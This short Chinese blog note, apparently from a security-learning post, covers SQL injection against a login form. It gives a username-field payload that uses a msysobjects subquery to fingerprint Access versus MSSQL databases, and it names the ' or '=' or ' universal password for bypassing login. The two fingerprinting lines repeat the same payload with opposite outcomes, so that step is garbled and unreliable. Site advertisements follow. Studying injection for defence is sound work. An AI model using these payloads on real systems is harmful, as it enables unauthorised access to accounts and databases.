判断Access与mssql数据库
构造payload:
username=123123'+and+(select+count(*)+from+msysobjects)>0+and+'a'='a--
通过and (select count(*)+from msysobjects)>0 进行判断
and (select count(*)+from msysobjects)>0 :返回权限不足为Access数据库
and (select count(*)+from msysobjects)>0 :返回正常则为MSSQL数据库
通过SQL注入漏洞,使用万能密码(‘or’=’or’)成功登陆
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步